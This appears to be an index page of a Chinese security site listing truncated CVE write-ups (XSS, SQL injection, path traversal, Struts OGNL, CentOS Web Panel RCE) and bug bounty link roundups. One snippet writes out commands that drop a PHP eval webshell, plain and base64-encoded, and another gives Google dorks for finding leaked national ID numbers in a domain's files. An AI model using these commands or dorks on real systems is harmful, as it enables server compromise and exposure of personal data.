CVE-2022-4301: WordPress Sunshine Photo Cart <2.9.15 - Cross-Site Scripting
漏洞标题 CVE-2022-4301: WordPress Sunshine Photo Cart <2.9.15 - Cross-Site Scripting 漏洞描述 WordPress Sunshine Photo Cart plugin before 2.9.15 contains a cross-site scripting ...
CVE-2024-21136: Oracle Retail Xstore Suite – Pre-authenticated Path Traversal
漏洞标题 CVE-2024-21136: Oracle Retail Xstore Suite - Pre-authenticated Path Traversal 漏洞描述 Vulnerability in the Oracle Retail Xstore Office product of Oracle Retail Applicatio...
威胁情报获取(浏览器)
Google搜索payload(文件类型+根域+关键词): filetype:xls site:xxx.huoxian.cn sfzh filetype:xls site:xxx.huoxian.cn 身份证号 filetype:pdf site:xxx.huoxian.cn sfzh filetype:pdf site:xxx...
CVE-2023-41597: EyouCms v1.6.2 – Cross-Site Scripting
漏洞标题 CVE-2023-41597: EyouCms v1.6.2 - Cross-Site Scripting 漏洞描述 EyouCms v1.6.2 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the compon...
CVE-2024-1512: MasterStudy LMS WordPress Plugin <= 3.2.5 - SQL Injection
漏洞标题 CVE-2024-1512: MasterStudy LMS WordPress Plugin <= 3.2.5 - SQL Injection 漏洞描述 The MasterStudy LMS WordPress Plugin for Online Courses and Education plugin for WordP...
CVE-2017-7921: Hikvision – Authentication Bypass
漏洞标题 CVE-2017-7921: Hikvision - Authentication Bypass 漏洞描述 Hikvision DS-2CD2xx2F-I Series V5.2.0 build 140721 to V5.4.0 build 160530, DS-2CD2xx0F-I Series V5.2.0 build 1407...
bugbounty技巧聚合20211027
挖洞技巧 What can I do with Open Redirect with OAuth? http://flex0geek.blogspot.com/2021/10/what-can-i-do-with-open-redirect-with.html Metacommunication and Bug Bounty Programs htt...
RCE~获取完整shell(Linux)
直接echo写入webshell: echo '<?php eval($_POST[1]); ?>' > 1.php base64写入webshell echo 'PD9waHAgZXZhbCgkX1BPU1RbMV0pOyA/Pg==' | base64 -d >1.php 重定向符号被转义时用ba...
CVE-2013-2251: Apache Struts 2 – DefaultActionMapper Prefixes OGNL Code Execution (S2-016)
漏洞标题 CVE-2013-2251: Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution (S2-016) 漏洞描述 In Struts 2 before 2.3.15.1 the information following "action:&quo...
Aiohttp CVE-2024-23334 目录遍历漏洞
漏洞标题 Aiohttp CVE-2024-23334 目录遍历漏洞 漏洞描述 Aiohttp 是一款开源的用于 asyncio 和 Python 的异步 HTTP 客户端/服务器框架。Aiohttp 存在目录遍历漏洞,此漏洞是由于应用程序读取文...
CVE-2023-34048: VMware vCenter Server – Out-of-Bounds Write
漏洞标题 CVE-2023-34048: VMware vCenter Server - Out-of-Bounds Write 漏洞描述 vCenter Server contains an out-of-bounds write caused by a vulnerability in the DCERPC protocol implem...
CentOS Web Panel index.php 远程命令执行漏洞 (CVE-2022-44877)
漏洞标题 CentOS Web Panel index.php 远程命令执行漏洞 (CVE-2022-44877) 漏洞描述 CentOS Web Panel(CWP)是Control Web Panel社区的一款免费的虚拟主机控制面板。Centos Web Panel 7v0.9.8....
503 service unavailable错误解决方案讲解_nginx
这篇文章主要介绍了503 service unavailable错误解决方案讲解,本篇文章通过简要的案例,讲解了该项技术的了解与使用,以下就是详细内容,需要的朋友可以参考下 1、打开网页访问出现503 service una...
CVE-2020-35774: twitter-server Cross-Site Scripting
漏洞标题 CVE-2020-35774: twitter-server Cross-Site Scripting 漏洞描述 twitter-server before 20.12.0 is vulnerable to cross-site scripting in some configurations. The vulnerability ...
CVE-2024-30194: Sunshine Photo Cart <= 3.1.1 - Reflected Cross-Site Scripting
漏洞标题 CVE-2024-30194: Sunshine Photo Cart <= 3.1.1 - Reflected Cross-Site Scripting 漏洞描述 WP Sunshine Sunshine Photo Cart versions up to 3.1.1 contain a cross-site scripti...
CVE-2021-3654: Nova noVNC – Open Redirect
漏洞标题 CVE-2021-3654: Nova noVNC - Open Redirect 漏洞描述 Nova noVNC contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obt...
